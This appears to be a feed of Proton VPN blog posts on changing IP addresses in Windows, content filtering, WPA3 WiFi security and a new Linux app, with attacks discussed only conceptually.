Of these ways to proxy your connection, the most effective, useful, and convenient method is to use a commercial VPN service such as Proton VPN. We are a 100% free VPN service with no logs, no data restrictions, and no artificial speed limits. 

We offer this free service because we believe privacy is a fundamental human right that should be available to everyone. If you want to support our mission and access a range of premium features, such as NetShield Ad-blocker, more than 3,000 servers in more than 65 countries, the ability to stream content from around the world, and more, you can sign up for a premium plan.

How to hide your external IP on Windows using Proton VPN

1 Sign up for a free Proton VPN account.

2. Download the Proton VPN Windows app

3. Open Windows Explorer, go to your Downloads folder, and double-click the ProtonVPN_win_vxxx.exe installation file you just downloaded.

• If a new window pops up asking Do you want to allow this app to make changes to your device?, click Yes.

• If installing for the first time, the OpenVPN TAP adapter installation windows will appear. Click Next. 
• The Windows .NET framework might also be required. If prompted, follow the instructions to install Windows .NET as well.

4. Select your preferred setup language, click Next, and follow the wizard to install the app onto your Windows system. 

5. Open the app and sign in using your Proton Account login details. 

6. Click Quick Connect to let the app pick the best server for your location. 

Alternatively, you can manually choose a country or server to connect to. If you are on our Free plan, you can connect to servers in Japan, the Netherlands, and the United States. If you are on one of our premium plans, you can connect to one of over 1700 servers in over 60 countries. 

Your real IP address is now hidden so that it cannot be seen by websites, P2P peers, or other observers on the internet. 

Learn more about VPNs

To make sure your IP address changed, visit a website such as ip.me with and without the VPN connection. 

Change your Windows IP address using a VPN router

Another way to change the external IP address of your Windows PC is to connect it to a VPN router. This is a router configured to route all devices connected to the internet through it (including Windows devices) through a VPN service such as Proton VPN.

Learn how to configure Proton VPN on your router

How to change your local IP address on Windows

Your local IP address is the IP address that your Windows device uses on your local area network (LAN). Your router uses it to send incoming data to the correct device, and other devices on the same local network can see your device’s local IP address. 

A common type of LAN is the home network, where all your household’s laptops, smartphones, tablets, smart devices, games consoles, smart TVs, and other internet-capable devices connect to the internet via a router and modem supplied by your internet service provider (ISP). 

Devices connected to a LAN do not connect directly to the internet, so no one on the internet can see their IP addresses. They see your modem’s IP address (unless it’s proxied — see above).

Below, we look at how to change your local IP address on Windows 10 and Windows 11. This changes your devices’ IP address on your LAN but doesn’t affect the IP address seen on the internet because that’s your modem’s IP address. 

Why change your local IP address on Windows?

By default, most routers dynamically assign IP addresses to devices on a local network using the Dynamic Host Configuration Protocol (DHCP). 

This means the IP address to your Windows PC may change depending on your network configuration (for example, when you take your Windows laptop out of the house and then return with it).

If other devices on your network access your Windows PC via its IP address, it’s a good idea to configure a static IP for it that your router will not change. For example, this would be useful if you use your Windows device as a media or LAN games server.

Local IPv4 vs IPv6 addresses

Windows 10, Windows 11, and most modern routers can use IPv6. Globally, Internet Protocol version 4 (IPv4) addresses are running out. To solve this problem, the much longer Internet Protocol version 6 (IPv6) address system is being rolled out, which vastly increases the number of addresses available.

However, the local IP addresses issued by your router are for private use only and are not affected by the IPv4 global shortage. So while it is possible to configure your Windows device to use an IPv6 address, there’s little point in doing so. 

Learn more about IPv4 vs. IPv6

How to change your local IP address on Windows 10

1. Go to Start → Settings

2. Select Network & Internet 

3. Select your internet connection (WiFi or Ethernet) and click on Properties.

4. Go to IP settings → IP assignment → Edit.

5. Click Automatic (DHCP) and select Manual from the dropdown menu.

6. Toggle the IPv4 switch on. 

7. Fill in the IP settings.

• IP address — This can be any numeric value in the 192.168.0.0 – 192.168.255.255 IP address range.
• Subnet prefix length — 24
• Gateway — Enter the IP address of the router or modem your PC is connected to. This is usually either 192.168.0.1 or 192.168.1.1
• Preferred DNS — Enter the IP address of a DNS server or DNS service (for example, 9.9.9.9 for Quad9).

Click Save when you’re done. 

8. You’ve successfully changed your IP address.

How to change your local IP address on Windows 11

1. Open the Settings app.

2. Go to Network & internet and select your network interface (Ethernet or WiFi).

3. If you have an Ethernet connection, click on IP assignment → Edit.

If you have a WiFi connection, click Hardware properties…

Followed by IP assignment → Edit.

4. Click Automatic (DHCP) and select Manual from the dropdown menu.

5. Toggle the IPv4 switch On. 

6. Fill in the IP settings.

• IP address — This can be any numeric value in the 192.168.0.0 – 192.168.255.255 IP address range.
• Subnet mask — If you know your subnet mask address, enter it. If not, enter 255.255.255.0.
• Gateway — Enter the IP address of the router or modem your PC is connected to. This is usually either 192.168.0.1 or 192.168.1.1.
• Preferred DNS — Enter the IP address of a DNS server or DNS service (for example, 9.9.9.9)
• Preferred DNS encryption — Choose the level of DNS encryption you prefer (if DNS server supports it).

Click Save when you’re done. 

7. You’ve successfully changed your IP address.

Troubleshooting

If you can no longer connect to the internet after making these changes, there are two possible reasons:

1. Two or more devices on your network have the same IP address

Check the IP addresses of all devices on your network and manually change any that have the same IP address using the instructions above.

2. Incorrect subnet mask

To find the name of your network’s subnet mask, Open the Command Prompt ap or Windows PowerShell app and enter the following command:

ipconfig

Look for the Subnet Mask entry under your Ethernet or Wireless LAN adapter Wi-Fi connection.

Frequently asked questions

The post How to change your IP address on Windows appeared first on Proton VPN Blog.

There are a few reasons they may do this:

• To improve the security of office networks
• To prevent customers, students at educational institutions, or anyone who uses a public WiFi hotspot from accessing illegal or undesirable content
• To improve productivity among staff members by restricting access to social media

In this article, we’ll dig deeper into why organizations use content filtering and how they implement it. 

• Why use content filtering?
• How does content filtering work?
• Other reasons for content filtering

Why use content filtering?

A business or organization may implement content filtering for a number of reasons. It’s commonly employed to enforce policies related to acceptable use, security, and compliance in various contexts, such as homes, schools, workplaces, and public networks.

Security

Content filtering helps to protect networks and systems from malware, viruses, and other security threats by blocking access to malicious websites and content. It can prevent employees from inadvertently downloading or accessing harmful files, and also protect them from phishing scams.

Acceptable Use

Many (if not most) organizations have acceptable use policies (AUPs) that govern how their network and internet resources can be used. For example, most companies don’t want staff using their office WiFi networks to access NSFW, offensive, discriminatory, or harassing  content.

Content filtering can enforce these policies by blocking access to websites and content that violate the AUP.

Public WiFi

Similarly, businesses that offer public WiFi services, such as cafés, airports, and hotels, use content filtering to ensure the security and safety of their customers, while preventing access to illegal or harmful content.

This is also true of universities, schools, and other educational establishments, which often impose stricter restrictions on their networks than commercial businesses do.  

Increased productivity

Organizations sometimes use content filtering to increase workplace productivity by restricting access to non-work-related websites, such as social media, gaming, and streaming platforms. 

The aim is to help ensure that employees stay focused on their tasks, but when everyone can trivially access such services on their smartphones, it’s questionable how effective such tactics are. 

Compliance

Businesses often use content filtering to ensure they adhere to industry regulations, legal requirements, and internal policies. This can include complying with data protection regulations such as HIPAA, GDPR, or CCPA by blocking staff from sharing sensitive information via email or other communication channels.

Content filtering can also be used to help ensure compliance with industry-specific regulations. For example, a financial institution might be subject to regulations such as the Sarbanes-Oxley Act or the Payment Card Industry Data Security Standard (PCI DSS), which require strict controls on data access and storage. Content filtering can help enforce these regulations.

Another aspect of compliance is record keeping and auditing. Content filtering solutions may provide logs and reports that can be used for auditing and compliance verification. These records can be critical for demonstrating that an organization is taking the necessary steps to meet its compliance obligations.

Bandwidth management

Content filtering can be used to manage network bandwidth more efficiently by prioritizing business-critical applications and limiting access to bandwidth-intensive activities such as video streaming.

How does content filtering work?

Content filtering can be implemented in various ways. The exact method used will depend on an organization’s needs (and it may use multiple content filtering techniques).

DNS filtering

The Domain Name System (DNS) maps human-readable domain names to their corresponding IP addresses (for example: protonvpn.com to 185.159.159.140). DNS filtering prevents DNS queries for blacklisted domains from being resolved. 

Learn more about how DNS works

In addition to web content filtering, DNS filtering can help protect organizations from malware and phishing threats by blocking access to known malicious domains. It can prevent users from inadvertently visiting websites that distribute malware or host phishing scams.

DNS filtering can also be used to block access to ad servers or domains known for delivering online advertisements. This helps reduce the number of ads displayed when browsing the web, thus providing a better experience for users.

Proton VPN offers a DNS filtering tool on all platforms called NetShield Ad-blocker that can block ads, malware, and trackers.

Learn more about NetShield Ad-blocker 

URL filtering

URL filtering is similar to DNS filtering, except that it blocks content based on its web address. This allows more fine-grained control than DNS filtering, as it can be used to block specific pages on a website, rather than the entire website. However, it’s less useful for blocking other content, such as malware and ads. 

Keyword filtering

Filtering content based on specific words or phrases is useful for blocking access to particular types or categories of websites, such as those which host gambling or adult content.

Whitelisting

Some organizations block access to all web content that can be accessed using company resources except for a predetermined list of “whitelisted” websites. This is usually done for security reasons. 

Content analysis

This is a fairly new type of content filtering that uses machine learning (AI) algorithms, such as natural language processing and image and video recognition, to analyze the content of websites and then implement blocks based on that analysis. 

Content analysis allows for much more nuanced content filtering than the traditional whitelist/blacklist approach. For example, AI content analysis filtering could tell the difference between an adult website and a website that offers sexual health advice.

However, there are numerous privacy and ethical concerns related to AI content analysis. These can be addressed with effective and responsible human oversight, but achieving the right balance between automated content analysis and human judgment remains a challenging issue. 

Other reasons for content filtering

Although the focus of this article is on organizations, such as businesses and educational facilities that use content filtering, it’s worth noting that content filtering is also used in other contexts.

Government censorship

Authoritarian governments around the world block their citizens’ access to content for political, social, or social religious reasons. As well as the kinds of content filtering listed above (often as the ISP level), governments use their power to execute additional types of content filtering.

Search engine blocks — Governments can pressure search engine providers to remove content they object to from search results.

Deep packet inspection (DPI)  — This is a method of examining data packets that pass through a network so that the traffic type can be identified. 

• Learn more about internet censorship and how it works
• Learn more about deep packet inspection

Parental control

A popular use of content filtering is by parents who wish to moderate what their children can access on the internet. Although traditionally performed by “net nanny” software, over recent years there has been a major shift toward using online software as a services (SaaS) solutions for this purpose. 

Final thoughts

There are many good reasons for organizations to perform content filtering. Moving forward, it’s likely that artificial intelligence will play an increasingly important role in this, so it’s important for companies to develop effective and ethical ways to safeguard the privacy of their staff, customers, or students. 

There is also the risk that authoritarian governments will abuse this power to restrict their citizens’ freedom. However, with Proton VPN for Business, you can evade such restrictions, allowing your organization’s staff unhindered to access the free and open internet. 

Learn more about how your business can benefit from using a VPN
[Get Proton VPN for Business]

The post What is content filtering? appeared first on Proton VPN Blog.

It’s a great improvement over its aging predecessor (WPA2), but there remain concerns over WPA3’s security. 

As a “standard”, WPA3 is not a specific piece of software. It’s not even a single algorithm or protocol. Rather, WPA3 is a collection of security methods specified by a certification organization and designated as the global “gold standard” for secure WiFi implementation.

With some 19.6 billion WiFi-capable devices currently in use, the need for secure WiFi is  clear. Let’s look at how your devices are designed to keep you safe.

• WPA3 — a history
• What is WPA3?
• WPA3 versions
• Related WiFi standards
• Known weaknesses
• How to use WPA3 on your router
• Final thoughts

WPA3 — a history

The Wired Equivalent Privacy (WEP) security algorithm, introduced in 1997, was part of the original IEEE 802.11 standard that defined how WiFi networks operate. Unfortunately, it quickly became clear that WEP was fatally flawed because of weaknesses in its encryption algorithm. 

In 2003, the nonprofit Wi-Fi Alliance®  officially announced the successor to WEP —  Wi-Fi Protected Access (WPA) standard, followed in 2004 by WPA2. This standard was considered secure until 2017, despite increasing concerns over its failure to provide perfect forward secrecy.

In 2018, researchers published a white paper showing that all WPA and WPA2 connections could be almost trivially hacked, exposing all data that wasn’t otherwise encrypted. For example, by using a VPN or HTTPS (which was much less common in 2017 than it is now). The only real limitation to this so-called KRACK attack was that the hacker had to be within physical range of the target WiFi network.   

The Wi-Fi Alliance rushed to patch the problem, but since a huge number of old routers remain in use, even WEP remains worryingly common more than 20 years after it was declared unfit for purpose, and billions of WPA2 routers remain in use that are unpatched. 

Fortunately (and much more successfully), Windows, macOS, Linux, Android, and iOS/iPadOS have all been patched to protect against KRACK.  

Nevertheless, few people were surprised when, in 2018, the Wi-Fi Alliance announced a new WiFi security certification, WPA3. 

What is WPA3?

WPA3 defines an amalgam of security standards. Some of these are mandatory and must be implemented for a device to display a Wi-Fi CERTIFIED™ sticker. Some standards are recommended for use with WPA3 but are not required for WPA3 certification. We’ll come to these later.

WPA3 includes many small improvements over WPA2 — far too many to detail here. However, the key improvements are:

Protected Management Frames (PMF)

Management frames play an important role in the underlying structure of wireless networking — notably in authenticating and deauthenticating devices. With PMF, these management frames are encrypted to provide protection against a number of threats, including:

• Disconnect attacks (also known as Wi-Fi deauthentication attacks) — A type of denial-of-service attack that disconnects a device from the WiFi network. Disconnect attacks are often used to facilitate other kinds of attack, such as…
• Honeypot and Evil twin attacks — These attacks attempt to trick you into connecting to malicious WiFi networks, so a hacker can snoop on your otherwise unencrypted browsing history. 

Improved password security

One of the central design goals behind WPA3 addresses the biggest problem with WiFi security — that people use weak, easily-guessed passwords to protect their WiFi networks. And with WPA2, even if you have changed your password to something genuinely secure, hackers can make an unlimited number of guesses as to what it is. 

Known as a dictionary attack (itself a form of brute force attack) hackers can use specialized software to throw thousands of passwords every minute at a route until the correct password is found. 

WPA3 mitigates against such attacks by using a Simultaneous Authentication of Equals (SAE) handshake, which prevents an attacker from guessing more than one password per attack.

This means every time an incorrect password is entered, the hacker must reconnect to the target WiFi network, making dictionary attacks impractical. SAE can also flag when a certain number of password attempts have been made. 

Perfect forward secrecy

A major problem with WPA2 is that it doesn’t use perfect forward secrecy. This means that if a router’s private key becomes compromised in some way, a hacker can compromise all otherwise unencrypted traffic passing through the router. In fact, it’s possible to collect encrypted data that doesn’t use PFS, to be decrypted at a later time if the key becomes available. 

The Simultaneous Authentication of Equals handshake used by WPA3 solves this problem.  Based on a Diffie–Hellman key exchange, WPA3 can implement perfect forward secrecy for WiFi connections, generating a new and unique private encryption key for each WiFi session. 

Learn more about perfect forward secrecy

WPA3 versions

There are two WPA3 standards tailored for different situations: personal and enterprise.

WPA3-Personal

Designed for home use, WPA3 Personal emphasizes convenience over security. Like WPA2, it uses AES-128 encryption in CCM mode, which authenticates the connection and encrypts it. But it additionally offers SAE to prevent brute force attacks (and therefore also perfect forward secrecy). 

Learn more about AES encryption

WPA3-Enterprise

Aimed at businesses, governments, and financial institutions, WPA3-Enterprise offers improved security at the cost of some convenience. For example, WPA3-Enterprise requires additional infrastructure to deploy, including an authentication server to handle device authentication and key management.

Unlike WPA3-Personal, the use of Protected Management Frames secured with 128-bit encryption is mandatory. 

For businesses that require additional security, WPA3-Enterprise offers an optional “192-bit security mode”, that uses AES-128 encryption in GCM mode to secure data and authenticate the connection. This is similar to CCM mode, but is arguably more secure and uses different mathematical equations.

The enterprise version also uses elliptic curve cryptography — a 384-bit ECDH or ECDSA key exchange — which is noted for being both fast and secure. And to validate encrypted connections, it uses HMAC SHA-385 hash authentication. Protected Management Frames must use a higher level of encryption: 256 bits. 

Related standards

In addition to PMF and SAE, the original WPA3 proposal included two standards that were dropped from the final WPA3 certification program. 

Wi-Fi Enhanced Open

Wi-Fi Enhanced Open uses Opportunistic Wireless Encryption (OWE) to greatly improve the security of public WiFi networks, mitigating many of the dangers associated with operating an open network. Wi-Fi Enhanced Open therefore allows for convenience of connecting to a WiFi hotspot without the need for authentication.

Wi-Fi Easy Connect 

A replacement to the wildly unsafe Wi-Fi Protected Setup (WPS), that allows you to connect to a router at the push of a button, Wi-Fi Easy Connect lets you to easily set up a device by scanning a QR code or NFC tag. As a nice bonus, this connection will persist, even if the WiFi password is changed. 

A missed opportunity?

Both these standards are available with their own certification schemes, but not including them in WPA3 was viewed as a mistake by some. This was made worse by the fact that WPA3’s increased encryption key standards are only an optional feature of WPA3-Enterprise certification.

As Mathy Vanhoef, the PhD researcher who discovered the KRACK vulnerability in WPA2 noted:

“Unfortunately, the WPA3 certification program only mandates support of the new dragonfly handshake. That’s it. The other features are either optional, or a part of other certification programs. I fear that in practice this means manufacturers will just implement the new handshake, slap a ‘WPA3 certified’ label on it, and be done with it”.

To be fair to the Wi-Fi Alliance, it wanted a quick uptake of the new standard from manufactures for security reasons, and was no doubt keen to make the transition as painless for them as possible.

To some extent, Vanhoef’s prediction has become true — there are many devices out there which only support the minimal WPA3 specification. However, there are also many higher-end devices that support the full range of Wi-Fi Alliance certifications.  

Known weaknesses

In 2020, Vanhoef published a group of five vulnerabilities, that he collectively termed Dragonsblood (referencing the Dragonfly Key Exchange of which SAE is a variant). These vulnerabilities exploit the fact that WPA3 is usually implemented with backwards-compatibility with WPA2, potentially allowing a hacker to perform a downgrade attack where they trick targets into connecting to a dummy router using WPA2. These WPA2 connections could then be hacked.

The Wi-Fi Alliance quickly announced the issue patched, but a paper published in 2020 (co-authored again by Vanhaoef) demonstrated that these patches were “insufficient”, because of the need for backward compatibility. 

It remains unclear if WPA3, when run in compatibility mode (see below), is still vulnerable in 2023 to Dragonsblood attacks, but devices set to use only WPA3-Personal or WPA3-Enterprise shouldn’t be vulnerable.  

How to use WPA3 on your router

To achieve a WPA3 connection, both the router and the device connecting to the router must use WPA3. Most routers built from around 2020 support WPA3, but people tend not to upgrade their routers often. 

There are consequently a huge number of older routers still in use that do not support WPA3. In addition to this, the huge popularity of IoT devices, many of which still use WPA2, has hindered the widespread adoption of WPA3. 

In theory, manufacturers can push firmware updates to older routers, allowing them to support WPA3. In practice, not all manufacturers do this (and certainly not for their whole back-catalog of router models). And even when they do, few people routinely update their router’s firmware.

To see if your router supports WPA3, log in to its admin page (typically by entering the local IP addresses 192.168.0.1 or 192.168.1.1 into your browser’s URL bar while connected to the router), and locating your router’s wireless security settings.

Most routers aimed at the domestic market default to a WPA3/WPA2 compatibility mode so that older WPA2-only devices can also seamlessly connect to them. Most domestic routers don’t support WPA3-Enterprise, as it’s not necessary for home use and requires additional hardware to deploy.

If your router doesn’t support WPA3, then it’s probably time to get another router. You can then connect it to the (likely low-quality) router/modem (set to run in modem-only mode) provided by your ISP. 

Final thoughts

WPA3 greatly improves on the WiFi security offered by WPA2, with no real downsides. However, nothing is perfect, and WPA3 is no exception. In particular, using WPA3/WPA2 compatibility mode offsets most of the advantages of using WPA3. 

Of wider concern is the fact that standards bodies such as the Wi-Fi Alliance are dominated by vendors who have a vested interest in preventing their unsold and recently sold hardware becoming obsolete. 

Fortunately, the almost ubiquitous uptake of HTTPS over the last few years provides a strong second layer of security when using WiFi to connect to the internet, making the dangers associated with using public hotspots largely a thing of the past. 

Learn more about HTTPS keeps you safe online

The post What is WPA3? appeared first on Proton VPN Blog.

Rebuilt from the ground up, the new Proton VPN Linux app is efficient, elegant, and modular in design, allowing us to easily add new features as we develop them.

An advanced Linux VPN app

Our new Linux app comes packed with a range of advanced VPN features:

• NetShield Ad-blocker — A DNS filtering feature that blocks ads, trackers, and malware
• Kill Switch — Ensures your real IP isn’t exposed if your VPN connection drops
• VPN Accelerator —  Can increase VPN speeds by up to 400% over large distance
• Moderate NAT — Can solve connection problems when playing multiplayer online games, or having video conversations using WebRTC
• Port forwarding — Greatly improves P2P performance
• Auto-connect at startup — Connect to your favorite VPN server on startup
• Pin servers to tray — Provides a convenient way to connect to your favorite servers
• OpenVPN DCO — Provides equivalent speed performance to WireGuard
• Secure Core — A double VPN security solution where the first server is located only in countries with strong privacy laws

Which Linux distributions are supported?

Going forward, we will officially support the Linux app on the latest versions of Debian, Ubuntu, and Fedora. This will allow us to concentrate our energies on delivering the best possible experience for our Linux community.

The app may work with many other Linux distributions (especially ones based on Debian and Ubuntu), but support for using the app on unsupported distros may be limited.

Roadmap

One of the big advantages of our new app is its modular design, which makes it easier for us to develop and implement new features. Current plans include:

• A command line interface — If you need this feature immediately, you can still use our old (v3) CLI tool.
• WireGuard — OpenVPN DCO produces identical speed performance to WireGuard, but we know this is a highly requested feature.

Become a Fedora package maintainer

We’re working on uploading the application to the official Fedora repositories, and are looking for community volunteers to support our mission to make privacy the default for everyone. If you’d like to be a Proton VPN package maintainer in the Fedora Project, please get in touch.

We’re excited about our new Linux app. It marks an important step forward in our support for Linux, an open-source operating system that respects your privacy. 

The post Introducing the new Proton VPN Linux app appeared first on Proton VPN Blog.